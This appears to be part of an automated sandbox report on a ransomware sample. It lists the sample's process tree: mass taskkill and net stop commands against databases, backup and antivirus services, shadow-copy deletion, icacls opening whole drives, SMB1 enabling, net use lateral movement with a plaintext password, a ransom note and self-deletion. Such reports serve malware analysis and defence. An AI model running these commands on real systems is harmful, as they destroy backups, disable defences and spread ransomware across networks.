      PID:3020
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM mysqld-nt.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2656
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM winword.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2480
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM mydesktopservice.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3272
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM visio.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2392
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM powerpnt.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2316
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM msftesql.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3780
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM tmlisten.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3100
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM outlook.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:936
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM msaccess.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2252
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM isqlplussvc.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2088
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM mspub.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2516
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM sqbcoreservice.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3068
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM mysqld.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2492
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM mydesktopservice.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3196
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM mspub.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3188
    • C:\Windows\system32\net.exe
      "net.exe" stop DCAgent /y
      PID:2356
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop DCAgent /y
        PID:2952
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$SHAREPOINT /y
      PID:2136
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
        PID:4244
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecVSSProvider /y
      PID:2732
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecVSSProvider /y
        PID:3600
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM CNTAoSMgr.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3388
    • C:\Windows\system32\netsh.exe
      "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
      PID:1080
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM mydesktopqos.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2084
    • C:\Windows\system32\netsh.exe
      "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
      PID:964
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM agntsvc.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:940
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM thebat.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3848
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM firefoxconfig.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2572
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM synctime.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3680
    • C:\Windows\system32\net.exe
      "net.exe" stop AVP /y
      PID:2328
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop AVP /y
        PID:2116
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$SBSMONITORING /
      PID:3144
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
        PID:2908
    • C:\Windows\system32\net.exe
      "net.exe" stop Antivirus /y
      PID:2972
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop Antivirus /y
        PID:3984
    • C:\Windows\system32\net.exe
      "net.exe" stop TrueKeyScheduler /y
      PID:2484
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop TrueKeyScheduler /y
        PID:3800
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLTELEMETRY /y
      PID:4040
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLTELEMETRY /y
        PID:3192
    • C:\Windows\system32\net.exe
      "net.exe" stop stc_raw_agent /y
      PID:2672
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop stc_raw_agent /y
        PID:2388
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM sqlwriter.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:952
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
      Suspicious use of AdjustPrivilegeToken
      PID:888
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM tbirdconfig.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4052
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM dbeng50.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3484
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM thebat64.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3540
    • C:\Windows\system32\cmd.exe
      "cmd.exe" /c net view
      PID:752
      • C:\Windows\system32\net.exe
        net view
        Discovers systems in the same network
        PID:4360
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM ocomm.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3920
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM infopath.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3508
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM mbamtray.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3928
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM zoolz.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3940
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM xfssvccon.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4020
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM dbsnmp.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3976
    • C:\Windows\system32\icacls.exe
      "icacls" "C:*" /grant Everyone:F /T /C /Q
      Modifies file permissions
      PID:2284
    • C:\Windows\system32\icacls.exe
      "icacls" "Z:*" /grant Everyone:F /T /C /Q
      Modifies file permissions
      PID:524
    • C:\Windows\system32\icacls.exe
      "icacls" "D:*" /grant Everyone:F /T /C /Q
      Modifies file permissions
      PID:928
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
      Suspicious use of AdjustPrivilegeToken
      PID:2344
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" IM thunderbird.exe /F
      Kills process with taskkill
      PID:3056
    • C:\Windows\system32\arp.exe
      "arp" -a
      PID:5060
    • C:\Windows\system32\net.exe
      "net.exe" use \\10.7.0.10\Users /USER:d.rustamov 64446846
      PID:4336
    • C:\Windows\system32\net.exe
      "net.exe" use \\10.7.0.10\Users /USER:
      PID:4364
    • C:\Windows\system32\net.exe
      "net.exe" use \\10.7.0.39\Users /USER:
      PID:3316
    • C:\Windows\system32\net.exe
      "net.exe" use \\10.7.0.39\Users /USER:d.rustamov 64446846
      PID:2968
    • C:\Windows\system32\net.exe
      "net.exe" use "\\MRBKYMNO\" /USER:d.rustamov 64446846
      PID:3036
    • C:\Windows\system32\cmd.exe
      "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp3683.bat
      PID:2216
    • C:\Windows\system32\net.exe
      "net.exe" use "\\MRBKYMNO\" /USER:
      PID:4600
    • C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
      Opens file in notepad (likely ransom note)
      Suspicious use of FindShellTrayWindow
      PID:4592
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\SyncApteka.bin.exe
      Deletes itself
      PID:3344
      • C:\Windows\system32\choice.exe
        choice /C Y /N /D Y /T 3
        PID:4244
    • C:\Windows\system32\cmd.exe
      "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
      PID:2152
      • C:\Windows\system32\PING.EXE
        ping 127.0.0.7 -n 3
        Runs ping.exe
        PID:4076
      • C:\Windows\system32\fsutil.exe
        fsutil file setZeroData offset=0 length=524288 “%s”
        PID:2328
  • C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    PID:2460
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "495509003210231438056457937816027281691098293190-187288732314128356142146993008"
    PID:2508
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "130648841460027729-1877919121939594528-114490520014118598061498087057442901440"
    PID:2500
  • C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    PID:1356
  • C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    PID:2696
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "18034369721979009320488044411593999301-17827841872081934220936431303622620552"
    PID:2112
    • C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ARSM /y
      PID:2268
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-88300685815815162401225110152-1840254462-197679409511698044921976808197-2074448225"
    PID:3724
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "178399211049532893344164614215042801241815335873-70926396820664123671835499644"
    PID:3524
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "1177182519-163407135017851178491722587936-35572988324935742018180592211101427827"
    PID:3432
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "113754351184479920633952647-5278228551255207793-1829398366-95734888458949381"
    PID:2064
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "1807060271418463034-3179165801094417392-1848267739-16020750962100231670143128254"
    PID:3288
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-2143241986-1513979916-853821850-2091479951-1432388280-243640775-153425933103784960"
    PID:2568
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-1748787083-20254476231203153414-29675323-1127320453-416102942-1741872149257248894"
    PID:2140
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-1092060117-288063398-17263171381973385389-1576687708-1105001086-1758608163959861799"
    PID:2744
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-941407417102771084277267979611477969665880117-2636039831613261508306219869"
    PID:2872
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "17846775241180888495-1168371101084993478-657577720-76359511015077902701942432868"
    PID:4012
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-272571851798147171-84999065620274222861073376794-6031474424807878791812184394"
    PID:2864
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-320566445-171677215253238862-7450757275595804071194008991-814497435-516194514"
    PID:2960
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "1414767290-831466543-18536519167789529361441058971-1835366081-1536457981408143095"
    PID:2856
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "19445464301444836803411788499-168626073519645534811553744369-1436492765-591755977"
    PID:3988
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "161949364-11021964251454162460-1633048453-1917134264-3134212531175797488-1263479598"
    PID:3040
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-516230278-15943610439927081571727147353-1330982828-1656930711-1458856660-536199717"
    PID:560
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-538998337-1996176807-4917388171921860218-271890875758641635-1968505968-1729221781"
    PID:2944
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-254458296-5380881931791860969-908709736558998385-271494614-911504158-1045063791"
    PID:1624
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "1398157670459663594-21032467641790456670-17482385961110391313-5090538791709718337"
    PID:2588
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-12895280794076594311869020782-857101585-4832746102104725668-7589497141823722683"
    PID:2120
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "1399143429-375649459-1700794903-190475780198904789347417096-67952581761680221"
    PID:2936
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-119496549-1378514071-209207773618710631561864757182251901231-20174478441075415570"
    PID:2828
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-15469008491166151571-188686056710203705201877085164-201344827-782456547-101026085"
    PID:308
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-9141663412135292374770380922-1439764845-15851718551586378613982160295-1212194643"
    PID:2820
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-17719748891866635239-204767081-166968631485794257911450643641688057945128501146"
    PID:2096
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-371816465-226661153-995430568175375232815381421638134067911909118482-2032159817"
    PID:2928
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-2113854270-1977292861-766370917205935730-1469446320633508756-1496991686-1814496363"
    PID:2576
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "682020618-179281898641240142-992705402-1515433608-2045185262-12830365931233237385"
    PID:2436
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "981811285455223837210822801-1594912808-1477327756-1323892102123300599469895568"
    PID:1588
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "128917010-16006121-1596056163-748973429-778914038-1581270318-8585983421255003548"
    PID:2056
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "6881964131181869170-86578583-54084765-7827901851889046511433829789105874986"
    PID:2804
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-429209517-1745564107-1680014279625698335706247876-26902171718504473951165433206"
    PID:2384
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-968253330741258883-16598211292005664218-16507771171822894904-12476734871376943901"
    PID:3176
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-11035219973953527871420524023-2082788469-666533418-2126708420-1269156072-1226252360"
    PID:2776
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "45152621-1877240906-2024413401052347464552197193-687155151-2904294731446951713"
    PID:2768
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-1175120708-2037302709886162256-7285756332146255801-1102150727-11998610121073752770"
    PID:2760
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "855078274-9719817552200260875765350839048645844250140961628630799-1060419296"
    PID:2292
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "468055822313556213-2507388121054065767-1722362627263584134-5349309291756489903"
    PID:1636
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "3509726453765834622115779261670257904523494876-1967034842926212078420168571"
    PID:368
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "12472419271379015085-1219758415-6323090621929014301916746751821168781450816266"
    PID:1852
  • C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\ResumeRename.vstx
    Modifies registry class
    PID:3440
Network

MITRE ATT&CK Matrix
• Collection
• Command and Control
• Credential Access
• Execution
• Exfiltration
• Impact
• Initial Access
• Lateral Movement
• Privilege Escalation
Downloads
• C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
  MD5: 00c21b618f79f924ec1ac1ec111cc0cf
  SHA1: 5584f7e04bcf669ef302e630e27ca0dc98a6d84b
  SHA256: 9869a35d0f2680b1d34985a178356e6f40567b1a8a2024f2980f629b9395b7f6
  SHA512: a88cab8ca0208abb3e90a83dd5e87b0ee04d9d388da67e9842c296cdc39d32531e77255f52f189b53c631219528ea6e9e0263304781edb906940522fc46c2690
• C:\Users\Admin\AppData\Local\Temp\o4uozb5v.exe
  MD5: 6f47970bd915ab3d24f0cf5a24223718
  SHA1: 791ba6733e718d5289b5e7e13d13efb93ec5033f
  SHA256: 2c5817a56e387283e450cf2abeb4c3e97bd53de135219325c104058c533f6b60
  SHA512: fdd894c26079854ee4d02e906bea472b49484cd4293a33edbe6c4c091473ef1ddbeb09669625166a36218501a35467a2013b59e44ee20cbc31050836e89640ac
• C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: a485c844233bfbbc02225216182ba2e2
  SHA1: 96e6da3e3e0616c563ec66ee60676add0ad4401d
  SHA256: 57fc5452ce6227b909d5567ecabf5fc6e1d436d7735f80cbaac0344ff5cd9e90
  SHA512: 26fbe7babea0517590f49c294f8ac592dd425e1a273306620f4e2ab8c1c30c81ac2265b06cbb66f61c0c714374c236c8a7c5bf9c408461e62f1046457a46c01b
• C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
  MD5: a71c5fa7dd251d451adfaed3b066efc3
  SHA1: 46b8300d97a30a6f3334099c7f61563ec4a5312e
  SHA256: 5143085d90af962c1f35b979d27fe35b8fd22e0c0f5d3a72c7f3be1f2428178c
  SHA512: 97395d4a2803756f7a81d7a108cefa60c0674cd74f767cccb7db31c7386db38120f01c4e5660a24313ed1ff13646dd1ab2d3a568cc7021a09666360f03d5f3bc
• \??\PIPE\wkssvc
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

• memory/108-80-0x0000000000000000-mapping.dmp
• memory/308-87-0x0000000000000000-mapping.dmp
• memory/412-62-0x0000000000000000-mapping.dmp
• memory/528-64-0x0000000000000000-mapping.dmp
• memory/560-94-0x0000000000000000-mapping.dmp
• memory/652-78-0x0000000000000000-mapping.dmp
• memory/664-68-0x0000000000000000-mapping.dmp
• memory/664-71-0x000007FEFBD21000-0x000007FEFBD23000-memory.dmp
• memory/684-67-0x0000000000000000-mapping.dmp
• memory/792-83-0x0000000000000000-mapping.dmp
• memory/860-91-0x0000000000000000-mapping.dmp
• memory/888-82-0x0000000000000000-mapping.dmp
• memory/888-142-0x000000001AAB0000-0x000000001AAB2000-memory.dmp
• memory/888-143-0x000000001AAB4000-0x000000001AAB6000-memory.dmp
• memory/888-149-0x000000001A830000-0x000000001A831000-memory.dmp
• memory/920-88-0x0000000000000000-mapping.dmp
• memory/948-75-0x0000000000000000-mapping.dmp
• memory/964-90-0x0000000000000000-mapping.dmp
• memory/1048-65-0x0000000000000000-mapping.dmp
• memory/1112-63-0x0000000000000000-mapping.dmp
• memory/1140-93-0x0000000000000000-mapping.dmp
• memory/1196-66-0x0000000000000000-mapping.dmp
• memory/1216-89-0x0000000000000000-mapping.dmp
• memory/1320-70-0x0000000000000000-mapping.dmp
• memory/1336-77-0x0000000000000000-mapping.dmp
• memory/1456-72-0x0000000000000000-mapping.dmp
• memory/1588-92-0x0000000000000000-mapping.dmp
• memory/1604-74-0x0000000000000000-mapping.dmp
• memory/1636-76-0x0000000000000000-mapping.dmp
• memory/1696-81-0x0000000000000000-mapping.dmp
• memory/1756-61-0x000000001AFD0000-0x000000001AFD2000-memory.dmp
• memory/1756-59-0x00000000003C0000-0x00000000003C1000-memory.dmp
• memory/1768-85-0x0000000000000000-mapping.dmp
• memory/1808-69-0x0000000000000000-mapping.dmp
• memory/1844-73-0x0000000000000000-mapping.dmp
• memory/1852-84-0x0000000000000000-mapping.dmp
• memory/1952-86-0x0000000000000000-mapping.dmp
• memory/2064-95-0x0000000000000000-mapping.dmp
• memory/2072-96-0x0000000000000000-mapping.dmp
• memory/2088-97-0x0000000000000000-mapping.dmp
• memory/2096-98-0x0000000000000000-mapping.dmp
• memory/2120-99-0x0000000000000000-mapping.dmp
• memory/2140-100-0x0000000000000000-mapping.dmp
• memory/2160-101-0x0000000000000000-mapping.dmp
• memory/2180-102-0x0000000000000000-mapping.dmp
• memory/2200-103-0x0000000000000000-mapping.dmp
• memory/2220-104-0x0000000000000000-mapping.dmp
• memory/2240-105-0x0000000000000000-mapping.dmp
• memory/2260-106-0x0000000000000000-mapping.dmp
• memory/2284-107-0x0000000000000000-mapping.dmp
• memory/2332-108-0x0000000000000000-mapping.dmp
• memory/2344-133-0x000000001AA50000-0x000000001AA52000-memory.dmp
• memory/2344-147-0x00000000023B0000-0x00000000023B1000-memory.dmp
• memory/2344-134-0x000000001AA54000-0x000000001AA56000-memory.dmp
• memory/2344-131-0x000000001AAD0000-0x000000001AAD1000-memory.dmp
• memory/2344-132-0x00000000024C0000-0x00000000024C1000-memory.dmp
• memory/2344-130-0x00000000022E0000-0x00000000022E1000-memory.dmp
• memory/2344-109-0x0000000000000000-mapping.dmp
• memory/2384-110-0x0000000000000000-mapping.dmp
• memory/2396-111-0x0000000000000000-mapping.dmp
• memory/2408-112-0x0000000000000000-mapping.dmp
• memory/2420-113-0x0000000000000000-mapping.dmp
• memory/2440-114-0x0000000000000000-mapping.dmp
• memory/2452-115-0x0000000000000000-mapping.dmp
• memory/2460-116-0x0000000000000000-mapping.dmp
• memory/2468-117-0x0000000000000000-mapping.dmp
• memory/2500-118-0x0000000000000000-mapping.dmp
• memory/2508-119-0x0000000000000000-mapping.dmp
• memory/2516-120-0x0000000000000000-mapping.dmp
• memory/2524-121-0x0000000000000000-mapping.dmp
• memory/2552-122-0x0000000000000000-mapping.dmp
• memory/2576-123-0x0000000000000000-mapping.dmp
• memory/2588-124-0x0000000000000000-mapping.dmp
• memory/2612-125-0x0000000000000000-mapping.dmp
• memory/2644-127-0x0000000000000000-mapping.dmp
• memory/2668-126-0x0000000000000000-mapping.dmp